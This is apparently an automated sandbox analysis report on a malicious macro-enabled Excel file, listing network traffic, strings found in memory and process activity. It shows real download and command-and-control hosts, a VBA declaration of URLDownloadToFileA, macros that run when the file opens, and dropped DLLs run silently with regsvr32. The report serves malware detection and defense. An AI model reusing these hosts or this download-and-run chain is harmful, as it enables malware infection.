Source: global traffic HTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salaodigitalautomovel.pt.deve.ptConnection: Keep-Alive
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400051881.0000000000405000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: monitrade.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Jan 2021 15:13:21 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en#0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5t
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2107200716.0000000001D70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2406809963.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2112116772.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2419749632.0000000000880000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2113665422.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2120190682.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2114236047.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2124921151.0000000001DF0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmp String found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmp String found in binary or memory: https://194.225.58.214/5
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://194.225.58.214/9
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://198.57.200.100:3786/hy;R
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63/h
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63/~
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://69.164.207.140/q
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp String found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49279 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49293 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49294
Source: unknown Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49293
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49286
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown Network traffic detected: HTTP traffic on port 49286 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49283
Source: unknown Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49283 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49279
Source: unknown Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49271
Source: unknown Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49309
Source: unknown Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown Network traffic detected: HTTP traffic on port 49232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49305

System Summary:

barindex
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo") Name: mi_1
Source: VBA code instrumentation OLE, VBA macro: Module Module1, Function mi_1, API Run("forsS_mo") Name: mi_1
Document contains an embedded VBA macro with suspicious strings
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare PtrSafe Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Declare Function P_Click_Box Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Found Excel 4.0 Macro with suspicious formulas
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: CALL
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar Jump to dropped file
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76D20000 page execute and read and write
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: printouts of outstanding as of 01_20_2021.xlsm OLE, VBA macro line: Private Sub vbox1_cli_Layout()
Source: VBA code instrumentation OLE, VBA macro: Module Sheet1, Function vbox1_cli_Layout Name: vbox1_cli_Layout
Document contains embedded VBA macros
Source: printouts of outstanding as of 01_20_2021.xlsm OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.expl.evad.winXLSM@41/22@7/11
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$printouts of outstanding as of 01_20_2021.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE30E.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: printouts of outstanding as of 01_20_2021.xlsm Virustotal: Detection: 24%
Source: printouts of outstanding as of 01_20_2021.xlsm ReversingLabs: Detection: 11%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
